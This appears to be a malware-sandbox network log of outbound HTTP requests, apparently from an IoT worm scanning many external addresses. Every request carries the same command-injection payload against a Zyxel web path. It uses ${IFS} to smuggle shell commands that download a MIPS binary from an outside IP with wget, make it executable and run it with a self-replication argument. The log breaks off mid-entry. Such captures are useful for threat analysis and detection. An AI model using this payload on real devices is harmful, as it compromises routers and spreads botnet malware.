                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935868025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2973192.168.2.1342758105.250.134.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935919046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2974192.168.2.1351390202.85.127.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935945034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2975192.168.2.1354614128.27.42.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.935993910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2976192.168.2.1360400110.54.237.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936048985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2977192.168.2.133597867.58.251.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936078072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2978192.168.2.1347438156.40.31.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936117887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2979192.168.2.1359444202.118.4.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936152935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2980192.168.2.1348298187.194.179.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936184883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2981192.168.2.135267870.208.135.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936223030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2982192.168.2.1341192117.225.46.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936258078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2983192.168.2.135436065.230.200.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936316013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2984192.168.2.135184896.238.141.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936347008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2985192.168.2.134517865.37.148.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936372995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2986192.168.2.1342118218.180.37.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936413050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2987192.168.2.135583035.11.63.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936453104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2988192.168.2.136060023.32.99.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936500072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2989192.168.2.135142651.209.255.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936548948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2990192.168.2.133287662.98.218.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936585903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2991192.168.2.1348592199.163.67.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936634064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2992192.168.2.1336502189.70.138.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936664104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2993192.168.2.1342350186.168.75.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936727047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2994192.168.2.1337590157.181.30.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936759949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2995192.168.2.13591584.150.220.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936800003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2996192.168.2.134886823.40.112.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936834097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2997192.168.2.13415364.132.11.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936862946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2998192.168.2.1349320131.188.143.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936893940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2999192.168.2.1360578133.237.0.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936949015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3000192.168.2.135262638.69.166.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.936996937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3001192.168.2.135265065.72.32.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937025070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3002192.168.2.134165489.168.45.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937073946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3003192.168.2.134943869.20.94.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937107086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3004192.168.2.134362835.1.179.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937141895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3005192.168.2.133927832.175.30.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937171936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3006192.168.2.133701876.7.125.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937210083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3007192.168.2.1345238174.253.160.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937251091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3008192.168.2.1359664104.5.254.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937289000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3009192.168.2.1342598149.215.46.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937323093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3010192.168.2.135005687.41.24.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937385082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3011192.168.2.1343746192.198.9.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937414885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3012192.168.2.1346336183.83.254.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937453032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3013192.168.2.134080667.155.234.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937491894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3014192.168.2.1359588178.190.145.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937546968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3015192.168.2.133833250.63.27.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937557936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3016192.168.2.1346146209.132.190.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937613010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3017192.168.2.1349092200.136.255.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937660933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3018192.168.2.1342400107.49.228.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937705040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3019192.168.2.1360114184.70.97.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937745094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3020192.168.2.133784469.147.175.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937788963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3021192.168.2.1355546174.55.14.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937829971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3022192.168.2.133696885.148.189.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937870026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3023192.168.2.1335944202.254.153.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937901020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3024192.168.2.1346196203.50.150.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937931061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3025192.168.2.13486669.173.83.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.937982082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3026192.168.2.1346622205.178.63.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938028097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3027192.168.2.1341064170.199.168.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938055992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3028192.168.2.1346626110.250.95.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938102007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3029192.168.2.1348370124.12.75.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938162088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3030192.168.2.1354426162.205.60.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938213110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3031192.168.2.1347170209.20.117.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938241005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3032192.168.2.133560458.147.138.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938260078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3033192.168.2.135824666.143.74.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938313961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3034192.168.2.1336324112.121.116.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938363075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3035192.168.2.134626437.141.244.242443
                                                  TimestampBytes transferredDirectionData
